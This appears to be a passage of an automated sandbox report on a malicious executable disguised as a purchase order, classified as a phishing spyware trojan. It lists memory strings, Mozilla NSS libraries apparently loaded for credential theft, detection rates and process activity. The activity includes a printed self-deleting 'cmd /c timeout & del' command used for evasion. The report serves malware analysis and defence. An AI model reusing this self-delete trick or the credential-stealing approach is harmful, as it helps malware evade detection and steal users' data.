                    Source: PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7158247147.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7141392781.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197102801.000000001E67C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7151568728.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7162881339.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7162736684.000000001DCC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7147239448.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7141563170.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7137545133.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7158985607.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7139597928.000000001DCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7147080304.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7162088614.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7191917075.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193561822.000000001E624000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197291781.000000001E68C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7144272032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7150187588.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeSection loaded: edgegdi.dll
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeSection loaded: edgegdi.dll
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeSection loaded: crtdll.dll
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
                    Source: PO No. 3200005919.exeReversingLabs: Detection: 61%
                    Source: PO No. 3200005919.exeVirustotal: Detection: 47%
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile read: C:\Users\user\Desktop\PO No. 3200005919.exeJump to behavior
                    Source: PO No. 3200005919.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\OverfurnishedJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\nsqF39C.tmpJump to behavior
                    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/56@2/2
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_004020FE CoCreateInstance,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
